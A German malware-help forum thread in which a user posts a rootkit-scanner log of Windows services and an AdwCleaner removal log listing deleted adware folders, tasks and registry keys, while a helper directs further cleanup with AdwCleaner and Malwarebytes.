21:27:12.0523 0x0ce4 [ 799ECD541A9B2764B36A22A095885365, E255E74682927D662294AA3F88FDA211EEE603466EB264E8941C3BACC6A0E530 ] vwififlt C:\WINDOWS\system32\drivers\vwififlt.sys
21:27:12.0538 0x0ce4 vwififlt - ok
21:27:12.0541 0x0ce4 [ 82CA088A33517D1C8571D6850CC13D7E, 0401A08EAF36DB393B74FE8693C60F62EDE10BBC9300C76812C7D01B6AE9A051 ] vwifimp C:\WINDOWS\System32\drivers\vwifimp.sys
21:27:12.0555 0x0ce4 vwifimp - ok
21:27:12.0564 0x0ce4 [ E75460AC4E936BFC0703021DB0BB17B8, D9985C3206B503659FD2F4EE7FD0B9AF8CB2DE821BFD68B13C9E3BD9CE5AEF6B ] W32Time C:\WINDOWS\system32\w32time.dll
21:27:12.0588 0x0ce4 W32Time - ok
21:27:12.0592 0x0ce4 [ F0F477541F7AF67CC05DA1CF4921A500, F7DD2F49B61C484596DE3893683B1172A138386BD71F54BFCF37A31005C7368F ] WacomPen C:\WINDOWS\System32\drivers\wacompen.sys
21:27:12.0599 0x0ce4 WacomPen - ok
21:27:12.0608 0x0ce4 [ A0957CBC1C054A87EE7A65A994102A96, CB6339F3F67D0E33C26E6756F88869574B84426B20C907E094F83B9DC5E36A3E ] WalletService C:\WINDOWS\system32\WalletService.dll
21:27:12.0625 0x0ce4 WalletService - ok
21:27:12.0629 0x0ce4 [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarp C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:27:12.0644 0x0ce4 wanarp - ok
21:27:12.0647 0x0ce4 [ FDD16EF9177A8A2EF08A7FA3D3EFAA13, 148F34CBEEF0CE87103C76294AE5BE318F990A5FE7A5EDE6F47D85361248582B ] wanarpv6 C:\WINDOWS\system32\DRIVERS\wanarp.sys
21:27:12.0662 0x0ce4 wanarpv6 - ok
21:27:12.0684 0x0ce4 [ EA0524A2A01792796EC80AE2FE08307A, 68CC0F3451C6797222411C276376C7741C96C45E628DD77FB1FB17C10DC0EA8A ] wbengine C:\WINDOWS\system32\wbengine.exe
21:27:12.0724 0x0ce4 wbengine - ok
21:27:12.0740 0x0ce4 [ 5E3E24AA72FA75D6322C7286917BEB4A, 97D0CF00873A5A70C1B4A73AD41F4053B22810DA37FF2E8528D510216311FEE1 ] WbioSrvc C:\WINDOWS\System32\wbiosrvc.dll
21:27:12.0767 0x0ce4 WbioSrvc - ok
21:27:12.0772 0x0ce4 [ 2B7CCCFBB166100842D31440228588CF, FC0BE611C5497A0579E7D8F268BBE1BD520A8A764F112C7C5CC631767B683B79 ] wcifs C:\WINDOWS\system32\drivers\wcifs.sys
21:27:12.0780 0x0ce4 wcifs - ok
21:27:12.0793 0x0ce4 [ E00FE13E415C97C60E5A418965372A74, E74EBE34D3056F52231C7B12E6294AED1C4F02219E853D5E70AA05D823C800D5 ] Wcmsvc C:\WINDOWS\System32\wcmsvc.dll
21:27:12.0818 0x0ce4 Wcmsvc - ok
21:27:12.0827 0x0ce4 [ 2C396871F724DDF871A2EF4CADE5151D, 8CAD8A393F0CC447432E1BED21A691E25356F7DBC06E3887138A6F86CB1D656D ] wcncsvc C:\WINDOWS\System32\wcncsvc.dll
21:27:12.0844 0x0ce4 wcncsvc - ok
21:27:12.0848 0x0ce4 [ 1737BEF60CA384423CE4B32AF1C2BFFC, D61353D3B2EAEDFDCBB5DB3AD27E76396CC7755AFF01233307EAA1967493DE63 ] wcnfs C:\WINDOWS\system32\drivers\wcnfs.sys
21:27:12.0856 0x0ce4 wcnfs - ok
21:27:12.0859 0x0ce4 [ 38130C1C5FE0E08820EE57E1B087B659, 3705AA4699D4C402C0BBC5BC4E1EE67CB4A4B9C27702E88952A76891C3A3F496 ] WdBoot C:\WINDOWS\system32\drivers\WdBoot.sys
21:27:12.0866 0x0ce4 WdBoot - ok
21:27:12.0881 0x0ce4 [ 0C6CBF3490EE5F0D62B5820568CA30B8, 97EDEC84DA72A900D7740B8763DDDAB600628F3F1E1DDE1212383C2E60FDC77C ] Wdf01000 C:\WINDOWS\system32\drivers\Wdf01000.sys
21:27:12.0899 0x0ce4 Wdf01000 - ok
21:27:12.0906 0x0ce4 [ F7B6CB0F9ECD28848E2BDACEAB0D9204, B64D91A36600AEBE656F0514AF8653C294DE88054FE6DBB7B1A6D0A23D2A5131 ] WdFilter C:\WINDOWS\system32\drivers\WdFilter.sys
21:27:12.0916 0x0ce4 WdFilter - ok
21:27:12.0920 0x0ce4 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiServiceHost C:\WINDOWS\system32\wdi.dll
21:27:12.0932 0x0ce4 WdiServiceHost - ok
21:27:12.0935 0x0ce4 [ 501CB5E6999B7336BE5D0D401013D251, D4581E4FD8BE65D611E763AE88D2982A785036B2A93F2A00D3A3A395AB2AD5B3 ] WdiSystemHost C:\WINDOWS\system32\wdi.dll
21:27:12.0947 0x0ce4 WdiSystemHost - ok
21:27:12.0961 0x0ce4 [ 2974422E31DBC953A585A065EF736948, B2E689579C12B1A8B2CB4F04875157E894CE747DF56A9B7083E04A8C9B85EAC5 ] wdiwifi C:\WINDOWS\system32\DRIVERS\wdiwifi.sys
21:27:12.0989 0x0ce4 wdiwifi - ok
21:27:12.0994 0x0ce4 [ 82A4F22C884B4BAE8B531640859F9871, 1C662557F671FA680E7CC2FC565B198470E421778BD03749CD05B2928568C430 ] WdNisDrv C:\WINDOWS\system32\Drivers\WdNisDrv.sys
21:27:13.0001 0x0ce4 WdNisDrv - ok
21:27:13.0003 0x0ce4 WdNisSvc - ok
21:27:13.0009 0x0ce4 [ 9066FE8EAB91E15437CB3C43757F2A65, 1F8B3D8C90C7862CCAB91D170F49E7F1D58FABAFA1C8DDDE1796404D1DD98707 ] WebClient C:\WINDOWS\System32\webclnt.dll
21:27:13.0023 0x0ce4 WebClient - ok
21:27:13.0029 0x0ce4 [ F322B8E6C5614E7975C8BF34B7A6710E, 299816001856E8C91BFBB9C48D87B7ACBD5A39F6A65147F5AE6EDB3065A893E9 ] Wecsvc C:\WINDOWS\system32\wecsvc.dll
21:27:13.0041 0x0ce4 Wecsvc - ok
21:27:13.0044 0x0ce4 [ 04CA184EB5743DE5A2CCEEF2DB2DA8B3, E16921496F57B78A152A103F8D58601C9687360048A6CB51E76A96E3B64CC0FA ] WEPHOSTSVC C:\WINDOWS\system32\wephostsvc.dll
21:27:13.0054 0x0ce4 WEPHOSTSVC - ok
21:27:13.0058 0x0ce4 [ BA78F20F7FD7709EA3AAAD91F8535EDA, D1DFBFCBBB8D4D992FBF3B340DB6A2F5DDC7E55F52E1100297EA2004FF752A2B ] wercplsupport C:\WINDOWS\System32\wercplsupport.dll
21:27:13.0070 0x0ce4 wercplsupport - ok
21:27:13.0075 0x0ce4 [ E5AE3B23620126483B957BDFF38FE7B7, 306AAA0B37F3914FE590A5DBFBF640C79173150C006BC7A6CF1683D85C0AFC5F ] WerSvc C:\WINDOWS\System32\WerSvc.dll
21:27:13.0086 0x0ce4 WerSvc - ok
21:27:13.0096 0x0ce4 [ 51D61CA3CED9A0C4E5501EEDBD48039F, 95F9CC67537DEABE501B59351624F02126BC9B9DBB72016423FF997090A2128B ] WFDSConMgrSvc C:\WINDOWS\System32\wfdsconmgrsvc.dll
21:27:13.0123 0x0ce4 WFDSConMgrSvc - ok
21:27:13.0128 0x0ce4 [ 3C8F0ABD00E197101DCF43FEF8FB0D76, AF5C68B85EE1503ACD4AEA1D997F816C34293A77791D59A605DC18450B4906DE ] WFPLWFS C:\WINDOWS\system32\drivers\wfplwfs.sys
21:27:13.0136 0x0ce4 WFPLWFS - ok
21:27:13.0140 0x0ce4 [ 2DEB40D6837956CE08A8F9EB3ECA5A01, B40D23E54CDF6BE05D6C5DA536BF6D998E79EDE9C391A42452F9F69EE206EA1E ] WiaRpc C:\WINDOWS\System32\wiarpc.dll
21:27:13.0149 0x0ce4 WiaRpc - ok
21:27:13.0153 0x0ce4 [ 75014BF6510D4C6C69EEE5B7743A52AF, 11AEEF4D52C35E5A7006713836ECF1198A53CD02736E792B1C698144CA1363F0 ] WIMMount C:\WINDOWS\system32\drivers\wimmount.sys
21:27:13.0158 0x0ce4 WIMMount - ok
21:27:13.0160 0x0ce4 WinDefend - ok
21:27:13.0166 0x0ce4 [ C8EBCFED8FD2CDF725E44AF93016621E, A0B76E55CC535A0F1D79C3C0EC59753086EAB669EC7ADA4F97656DCAD2A69448 ] WindowsTrustedRT C:\WINDOWS\system32\drivers\WindowsTrustedRT.sys
21:27:13.0173 0x0ce4 WindowsTrustedRT - ok
21:27:13.0176 0x0ce4 [ D318557F9D7CA3836104F0B8ECB1F32E, 6850BBFB4F65167B052F3CA22FD72E9188A14FD2A9CC085861B4BC40CBA34249 ] WindowsTrustedRTProxy C:\WINDOWS\system32\drivers\WindowsTrustedRTProxy.sys
21:27:13.0182 0x0ce4 WindowsTrustedRTProxy - ok
21:27:13.0196 0x0ce4 [ 61F0D6574577499FB43D9F4870B08A7F, 757ACD4F292C43B04B6428D84A7147DE8E565716D94B6B02F288F3B5E2D1C135 ] WinHttpAutoProxySvc C:\WINDOWS\system32\winhttp.dll
21:27:13.0217 0x0ce4 WinHttpAutoProxySvc - ok
21:27:13.0221 0x0ce4 [ 31DDF1D001336B2DCE7DF24E99EF1D04, A1FCABF4A263BFAE042FE7A9F6C15FD9B3D8E985278C32AE8975ECE79B341277 ] WinMad C:\WINDOWS\System32\drivers\winmad.sys
21:27:13.0226 0x0ce4 WinMad - ok
21:27:13.0234 0x0ce4 [ 9A26F7834706A6D8C8824EB08FD7C362, 750F6A0759D70BE481C70FE4BB21D18E756A8F0C23A014C2CE1E7729A1E625FE ] Winmgmt C:\WINDOWS\system32\wbem\WMIsvc.dll
21:27:13.0250 0x0ce4 Winmgmt - ok
21:27:13.0256 0x0ce4 [ 2E1A614EFB0523E20860AE7978DDA0A4, E13564690F9977747CA676D3843B467506447F060A5FF6676835A9C7A30BA409 ] WinNat C:\WINDOWS\system32\drivers\winnat.sys
21:27:13.0266 0x0ce4 WinNat - ok
21:27:13.0305 0x0ce4 [ 27DAA9AA3E03C1068678D5659461BB32, AFDED6D671C430F296C9EAA73590111D6A8A9FA93DFE0595B90467FFE28EFB35 ] WinRM C:\WINDOWS\system32\WsmSvc.dll
21:27:13.0376 0x0ce4 WinRM - ok
21:27:13.0384 0x0ce4 [ 03858B18BB6DF6A400D9FC5153FD28A8, C7AD69B022AEFDDDAFB74CCCDF20AF9CCDBA0097634BBBD07A2EFBA5922560C1 ] WINUSB C:\WINDOWS\System32\drivers\WinUSB.SYS
21:27:13.0392 0x0ce4 WINUSB - ok
21:27:13.0396 0x0ce4 [ 0BF4A43CF1F3A4D50AFA4561C3B4628D, 2D0B4E7004C8AC8A9EE07E6D5241BF32395CA142BF3B03FA9CF00BC6720A6AC7 ] WinVerbs C:\WINDOWS\System32\drivers\winverbs.sys
21:27:13.0402 0x0ce4 WinVerbs - ok
21:27:13.0414 0x0ce4 [ 11DDD4C9BDF095A5F5B5ACA98FBBF7A2, CFA76C197987CC9EBFE4AC2AD6FE9A9620819B50E9DD423BCE13F7DB5DA641D8 ] wisvc C:\WINDOWS\system32\flightsettings.dll
21:27:13.0436 0x0ce4 wisvc - ok
21:27:13.0470 0x0ce4 [ E624376E7E7D9AC203113140D9E618A2, 3553D343665194492E38B8C437DE429CEAC135D69EC0CB951BA3E3A7549F673E ] WlanSvc C:\WINDOWS\System32\wlansvc.dll
21:27:13.0534 0x0ce4 WlanSvc - ok
21:27:13.0566 0x0ce4 [ 2393C4DB3DF3D19B0B920AD607098E79, D632671247DE3808D9C5B36A3FF173C86BB3AD274D03C851BCD417CE62B3820D ] wlidsvc C:\WINDOWS\system32\wlidsvc.dll
21:27:13.0619 0x0ce4 wlidsvc - ok
21:27:13.0640 0x0ce4 [ E5AB2E0B4F766E34AFC768D9769A24D7, 0DE04B2F43B9DCC92F9215B1058EE4ABA228B9986051CF39959555C12DF017B3 ] wlpasvc C:\WINDOWS\System32\lpasvc.dll
21:27:13.0680 0x0ce4 wlpasvc - ok
21:27:13.0684 0x0ce4 [ 0D6E1347A891607759340B1E55BA2A77, 033DF14920A581FE7E21C6930280AE159B5634F2FEAF79423E8D0B7D46500048 ] WmiAcpi C:\WINDOWS\System32\drivers\wmiacpi.sys
21:27:13.0691 0x0ce4 WmiAcpi - ok
21:27:13.0697 0x0ce4 [ F7B122E8A238354DE344B77216E8D9AC, 3C4F864655CFF786B33333E643AA929B2D2B01ECD56EEEEADE7CEAB38249DA3B ] wmiApSrv C:\WINDOWS\system32\wbem\WmiApSrv.exe
21:27:13.0713 0x0ce4 wmiApSrv - ok
21:27:13.0715 0x0ce4 WMPNetworkSvc - ok
21:27:13.0720 0x0ce4 [ 1AE1076034392218EE89D2744EC2A071, 695C28E2697B12BBD919687176CE082E94887A5D8B6229F163A26F6EDF401C4C ] Wof C:\WINDOWS\system32\drivers\Wof.sys
21:27:13.0729 0x0ce4 Wof - ok
21:27:13.0756 0x0ce4 [ D571821EDAA1F23EB521314FB9AA1C88, 7F16E6915060BD5FABE0805284631F92EEC11234579D09C3CEDDBF73D312E7F5 ] workfolderssvc C:\WINDOWS\system32\workfolderssvc.dll
21:27:13.0800 0x0ce4 workfolderssvc - ok
21:27:13.0805 0x0ce4 [ 2AD9CC8445F0E1A8900A9DE123643CD2, A5928B26722DFBB201A32DEF48B25D4BF291815EA68CF50CBE79EEA9260A71E3 ] WPDBusEnum C:\WINDOWS\system32\wpdbusenum.dll
21:27:13.0815 0x0ce4 WPDBusEnum - ok
21:27:13.0819 0x0ce4 [ 1FD80CBB192A20375F3664639DEB57B5, 7A4789D4B2F8E289726E1C723DC00D5AC1F8C5E00FB2879C9D0E6DDC97D2B1A6 ] WpdUpFltr C:\WINDOWS\system32\drivers\WpdUpFltr.sys
21:27:13.0824 0x0ce4 WpdUpFltr - ok
21:27:13.0831 0x0ce4 [ 3369EF007E43B88EAC8F1789B43D4393, 347F9F7DF980BB739895EDFE72E2E595EF56634330DC63DAA36403AB232B5B5A ] WpnService C:\WINDOWS\system32\WpnService.dll
21:27:13.0844 0x0ce4 WpnService - ok
21:27:13.0848 0x0ce4 [ 41403B9466EDA80FACD7713478A56DF8, A71BF9C7A2483FE1F660AC9688FCB38BA2310F16A69EB117C948458364953F34 ] WpnUserService C:\WINDOWS\System32\WpnUserService.dll
21:27:13.0858 0x0ce4 WpnUserService - ok
21:27:13.0862 0x0ce4 [ DAF4451760B46CB383D287C4FAFFE97D, 658AFE31EF50E934FEDD2E7048257DBFE9E6DE5F1ACDC658B21737391CF1CC5A ] ws2ifsl C:\WINDOWS\system32\drivers\ws2ifsl.sys
21:27:13.0874 0x0ce4 ws2ifsl - ok
21:27:13.0880 0x0ce4 [ D4A0661AB0FE542460CA76BFB4FAA2D6, 149F0A0720C47BFFCA68165A46382E5CBB273F48483DBB598CEA320801664718 ] wscsvc C:\WINDOWS\System32\wscsvc.dll
21:27:13.0893 0x0ce4 wscsvc - ok
21:27:13.0896 0x0ce4 [ F6E37A2C168A58F0172DA50018959228, C97305641F63BC84F5207A739F442ACB0A5FD9262331BB61C4B00CF2C6D94121 ] WSDPrintDevice C:\WINDOWS\System32\drivers\WSDPrint.sys
21:27:13.0903 0x0ce4 WSDPrintDevice - ok
21:27:13.0907 0x0ce4 [ F454BF3F0D3F19057B8612CA523D22D5, 869EC91E7D709C15ADF9D53C82A87F2D5220ED3CA44CEBF34F4D601E78DA0481 ] WSDScan C:\WINDOWS\system32\DRIVERS\WSDScan.sys
21:27:13.0915 0x0ce4 WSDScan - ok
21:27:13.0918 0x0ce4 WSearch - ok
21:27:13.0954 0x0ce4 [ 05BEDBBEEAAC22F98FCA529FAC659582, E4D2FFF98034E2E7FE0478AB9C8D677CA932349A976DFC0C2B65DB15C71354B4 ] wuauserv C:\WINDOWS\system32\wuaueng.dll
21:27:14.0011 0x0ce4 wuauserv - ok
21:27:14.0017 0x0ce4 [ 455609BF60DA3B57EEAB863DEFCCF14D, F55271C42B7AFD17D01275703719C1F52C21996DB82AC78A70A8A8B62370623B ] WudfPf C:\WINDOWS\system32\drivers\WudfPf.sys
21:27:14.0026 0x0ce4 WudfPf - ok
21:27:14.0032 0x0ce4 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFRd C:\WINDOWS\System32\drivers\WUDFRd.sys
21:27:14.0044 0x0ce4 WUDFRd - ok
21:27:14.0049 0x0ce4 [ 9EFE23CA208BF4B613FF4A6028DFAB10, 483D8D8DA578BF3EA5617EAB42457543EC6F97C1977BDD8ABFDF854AE3AAFD35 ] wudfsvc C:\WINDOWS\System32\WUDFSvc.dll
21:27:14.0060 0x0ce4 wudfsvc - ok
21:27:14.0066 0x0ce4 [ 5068DAA8F67A62E964C9C9F88B159EA9, 09FCB7A817280957D1AD365EF8B46F666C70957238BF9FBC87D51115E1B0FCB0 ] WUDFWpdFs C:\WINDOWS\system32\DRIVERS\WUDFRd.sys
21:27:14.0078 0x0ce4 WUDFWpdFs - ok
21:27:14.0100 0x0ce4 [ 3EEF7185E0974D9AB2D65CA3214132CF, 44DB1D11B6B1D180F59AB3FE4D7235F7F2FD709A853F6A64E8E379FFFD16CD3C ] WwanSvc C:\WINDOWS\System32\wwansvc.dll
21:27:14.0146 0x0ce4 WwanSvc - ok
21:27:14.0154 0x0ce4 [ FC0147AB34C7CDB2D8A1B29C207F2CD1, 737D40A4BE35AD13C091D8E320FAD3FD7C0C7E41C8B50E48D3C2151712A55718 ] xbgm C:\WINDOWS\System32\xbgmsvc.dll
21:27:14.0166 0x0ce4 xbgm - ok
21:27:14.0182 0x0ce4 [ 8C7C5945C3545CA767BE111D78C15314, 5A938679DA3EDA2D9CA7034908DFEFCC7DAADB10DFD0CF4ECE882FF536D1BFA2 ] XblAuthManager C:\WINDOWS\System32\XblAuthManager.dll
21:27:14.0214 0x0ce4 XblAuthManager - ok
21:27:14.0233 0x0ce4 [ A8BD191F46CC58E45637CB3E262CF0F2, CA65524427ECDB5E1138A5F8E885566064E507BA60FC31E0D9D17B9556CC9ADC ] XblGameSave C:\WINDOWS\System32\XblGameSave.dll
21:27:14.0265 0x0ce4 XblGameSave - ok
21:27:14.0272 0x0ce4 [ 3AC720A97FE4B6325F3012B21AF74390, 41AC655BD5CE5016BAA482534D1CEA6E11EAECE121344B45A5C8DF84A83807F4 ] xboxgip C:\WINDOWS\System32\drivers\xboxgip.sys
21:27:14.0284 0x0ce4 xboxgip - ok
21:27:14.0287 0x0ce4 [ E099DED5C602AE4A7ECCF7CD4B1D2E33, 7FDAFFE13B87A8E6AA8721F8905FFF6EF04CAB93009F68EDA862B57EBB04514F ] XboxGipSvc C:\WINDOWS\System32\XboxGipSvc.dll
21:27:14.0296 0x0ce4 XboxGipSvc - ok
21:27:14.0312 0x0ce4 [ 8489AA1A36074B3487BFDA8A9FDBAB3D, 59337C1F65AF42820260FCE271D18C2221B64A5E53005A11ECF397F651031C6A ] XboxNetApiSvc C:\WINDOWS\system32\XboxNetApiSvc.dll
21:27:14.0348 0x0ce4 XboxNetApiSvc - ok
21:27:14.0352 0x0ce4 [ 2E50A379A8E4F6C5D85E87C26C08D329, ADA0C344FE58A3772FFF7417268160E488741C5B2F08CA12ED587AB7F75756F6 ] xinputhid C:\WINDOWS\System32\drivers\xinputhid.sys
21:27:14.0360 0x0ce4 xinputhid - ok
21:27:14.0361 0x0ce4 ================ Scan global ===============================
21:27:14.0365 0x0ce4 [ EEA8447A2E39A39F66C74BA66C421F92, 7FFC5294E0D0438E7450ED36947AB04D0C84DF4E1C9F2D49340D3BA586FFFAB2 ] C:\WINDOWS\system32\basesrv.dll
21:27:14.0368 0x0ce4 [ A42970F5DAA633B35322F200C39DF4CF, 91EEA2A5BA8FF0CBCB058218B01E747D29ADE4544AFC5474C71DB380866B4F2E ] C:\WINDOWS\system32\winsrv.dll
21:27:14.0373 0x0ce4 [ 7DD72CBE412C9567661F4B1CE9631FC1, 8D914805CBDAF448C8C132C4C3FEB1D90804F4F485180F7364A75EC5655A4DDB ] C:\WINDOWS\system32\sxssrv.dll
21:27:14.0385 0x0ce4 [ 800D00D1A7ADA9E341CACDF287347584, 70AD5A458203B35F227F3F6B4783D00424C96AA9E29DB3090CEC8C00E62CD8E5 ] C:\WINDOWS\system32\services.exe
21:27:14.0392 0x0ce4 [ Global ] - ok
21:27:14.0393 0x0ce4 ================ Scan MBR ==================================
21:27:14.0394 0x0ce4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
21:27:14.0442 0x0ce4 \Device\Harddisk0\DR0 - ok
21:27:14.0444 0x0ce4 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk1\DR1
21:27:14.0537 0x0ce4 \Device\Harddisk1\DR1 - ok
21:27:14.0537 0x0ce4 ================ Scan VBR ==================================
21:27:14.0540 0x0ce4 [ 351CECEC6A59AE7E66C90571BB64BDAD ] \Device\Harddisk0\DR0\Partition1
21:27:14.0541 0x0ce4 \Device\Harddisk0\DR0\Partition1 - ok
21:27:14.0542 0x0ce4 [ B8EFACFC8DDDACD5C7BB953E94688084 ] \Device\Harddisk0\DR0\Partition2
21:27:14.0543 0x0ce4 \Device\Harddisk0\DR0\Partition2 - ok
21:27:14.0544 0x0ce4 [ 7CDAA8D0E7BFAF4494CB22AEA4D87AD1 ] \Device\Harddisk1\DR1\Partition1
21:27:14.0545 0x0ce4 \Device\Harddisk1\DR1\Partition1 - ok
21:27:14.0546 0x0ce4 ================ Scan generic autorun ======================
21:27:14.0546 0x0ce4 SecurityHealth - ok
21:27:14.0658 0x0ce4 [ 912858EE253CA62AC0DC326BB556273B, 6E2BBDA20BB439AE8215FAE7FEDA3DE72F74A336435CE2567E36741D0682B9E5 ] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
21:27:14.0775 0x0ce4 RTHDVCPL - ok
21:27:14.0793 0x0ce4 [ ED43758BF94B8A5221D69F1B7F63F13D, F6E7418823E45085F4D4F50DD25A55ED517C0A335C6C2F69A1139B30677D3DA9 ] C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe
21:27:14.0809 0x0ce4 XboxStat - ok
21:27:14.0818 0x0ce4 [ F8A8125BF28F03D79CDEA5B0B69FF60B, 13E5DE36EB61384B0726447442F0CE4838C20E4F3F730B9B9BB84A2020A68A82 ] C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
21:27:14.0827 0x0ce4 IJNetworkScannerSelectorEX - ok
21:27:14.0832 0x0ce4 [ CD0362AEE36CFE1EF5DF973230742E67, 9F1D8AD4E09D16C39CD6A35CB298456468C1808226FFA8AD65BF9562A6ECC07D ] C:\Program Files (x86)\PDF24\pdf24.exe
21:27:14.0841 0x0ce4 PDFPrint - ok
21:27:14.0846 0x0ce4 [ ED13374E76D833772A687EA3594C1120, 3A2A0C41DED8555ACEB9CAAE7F9C0053B11CEE1877B06D993BDCA0E491DB6CE6 ] C:\Program Files (x86)\Drakonia Configurator\hid.exe
21:27:14.0854 0x0ce4 GamingMouse - detected UnsignedFile.Multi.Generic ( 1 )
21:27:15.0210 0x0ce4 GamingMouse ( UnsignedFile.Multi.Generic ) - warning
21:27:15.0737 0x0ce4 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:27:16.0017 0x0ce4 OneDriveSetup - ok
21:27:16.0290 0x0ce4 [ 450FDD861FD582026BDCE55FCB2162C4, 91166DBAEE6A0D97ABA5EED352D06078870A265E736ED491C666CB6A8559BEB2 ] C:\Windows\SysWOW64\OneDriveSetup.exe
21:27:16.0567 0x0ce4 OneDriveSetup - ok
21:27:16.0604 0x0ce4 [ 39F07FEA9532CD88F388ECABEFE37CD2, 59A73628DE72CAFA0B8A3E22054EEEF85820AD012BC68E279A4B5E0B728E9621 ] C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
21:27:16.0628 0x0ce4 Spotify Web Helper - ok
21:27:16.0651 0x0ce4 [ 00F30FDFDE3E276C1A731C2DF951D67E, 018E6933882FCC41EE96E198E6F7ECEFB53EC650B1044A58876B26EDE011158B ] C:\Users\Dino\AppData\Local\Microsoft\OneDrive\OneDrive.exe
21:27:16.0677 0x0ce4 OneDrive - ok
21:27:16.0694 0x0ce4 [ 39D212A2684CC960AA166629CC2A5B89, 816D9B1405BD5BB073EFDA8F3B6F1A5DCAE739AB3FEB9267FDD4A113A5E8F1B7 ] C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
21:27:16.0712 0x0ce4 SmartSwitchPDLR.exe - ok
21:27:16.0714 0x0ce4 Waiting for KSN requests completion. In queue: 280
21:27:17.0731 0x0ce4 AV detected via SS2: Windows Defender, C:\Program Files\Windows Defender\MSASCui.exe ( 4.11.15063.0 ), 0x60100 ( disabled : updated )
21:27:17.0732 0x0ce4 AV detected via SS2: Bitdefender Virenschutz, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41000 ( enabled : updated )
21:27:17.0733 0x0ce4 FW detected via SS2: Bitdefender Firewall, C:\Program Files\Bitdefender\Bitdefender 2017\wscfix.exe ( 21.0.25.76 ), 0x41010 ( enabled )
21:27:17.0987 0x0ce4 ============================================================
21:27:17.0987 0x0ce4 Scan finished
21:27:17.0987 0x0ce4 ============================================================
21:27:17.0991 0x29a0 Detected object count: 1
21:27:17.0991 0x29a0 Actual detected object count: 1
21:27:25.0283 0x29a0 GamingMouse ( UnsignedFile.Multi.Generic ) - skipped by user
21:27:25.0283 0x29a0 GamingMouse ( UnsignedFile.Multi.Generic ) - User select action: Skip
Ich denke jetzt habe ich alles. |
|
22.05.2017, 14:55
| #11 |
| /// TB-Ausbilder | Trojaner, Adware oder sonstiges ? Servus, Schritt 1 Downloade Dir bitte AdwCleaner auf deinen Desktop.
Schritt 2 Downloade Dir bitte Malwarebytes Anti-Malware 3
Schritt 3
Bitte poste mit deiner nächsten Antwort
|
|
22.05.2017, 17:38
| #12 |
| | Trojaner, Adware oder sonstiges ? Hi Matthias, AdwCleaner soll mittlerweile ein neues Update (6.047) haben. Habe aber die Version von Filepony genommen wie du es beschrieben hast. Anbei der Log. Code:
ATTFilter # AdwCleaner v6.046 - Bericht erstellt am 22/05/2017 um 18:19:38
# Aktualisiert am 24/04/2017 von Malwarebytes
# Datenbank : 2017-05-19.1 [Server]
# Betriebssystem : Windows 10 Pro (X64)
# Benutzername : Dino - ****
# Gestartet von : C:\Users\Dino\Desktop\AdwCleaner_6.046.exe
# Modus: Löschen
# Unterstützung : https://www.malwarebytes.com/support
***** [ Dienste ] *****
***** [ Ordner ] *****
[-] Ordner gelöscht: C:\ProgramData\4f229b49-57c7-0
[-] Ordner gelöscht: C:\ProgramData\4f229b49-5e15-0
[-] Ordner gelöscht: C:\ProgramData\646f2bbc
[-] Ordner gelöscht: C:\ProgramData\b540151d-6521-1
[-] Ordner gelöscht: C:\ProgramData\b540151d-6b21-0
[-] Ordner gelöscht: C:\ProgramData\{094151c3-112c-0}
[-] Ordner gelöscht: C:\ProgramData\{1ed33b8d-712c-0}
[-] Ordner gelöscht: C:\ProgramData\{2b0a4a26-612c-1}
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Note-up
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\gplyra
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Kuaizip
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Softlink
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Microleaves
[#] Ordner mit Neustart gelöscht: C:\Users\Dino\AppData\Roaming\Note-UP
[-] Ordner gelöscht: C:\Program Files\Common Files\Noobzo
[-] Ordner gelöscht: C:\ProgramData\DownloadManager
[-] Ordner gelöscht: C:\ProgramData\SearchModule
[-] Ordner gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Program Files (x86)\BestCleaner
[-] Ordner gelöscht: C:\Users\Dino\AppData\Local\app
[#] Ordner mit Neustart gelöscht: C:\Program Files (x86)\DPower
[-] Ordner gelöscht: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\naweriweentcofise
[-] Ordner gelöscht: C:\WINDOWS\SysWOW64\sstmp
***** [ Dateien ] *****
[-] Datei gelöscht: C:\WINDOWS\SysNative\drivers\NetUtils2016.sys
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Verknüpfungen ] *****
***** [ Aufgabenplanung ] *****
[-] Aufgabe gelöscht: {0E0E0947-0F0F-7D0F-7D11-0E0F78051104}
***** [ Registrierungsdatenbank ] *****
[-] Schlüssel gelöscht: HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Spark
[#] Schlüssel mit Neustart gelöscht: HKCU\Software\Spark
[-] Schlüssel gelöscht: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Schlüssel mit Neustart gelöscht: [x64] HKCU\Software\Spark
[-] Daten wiederhergestellt: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a} [NameServer]
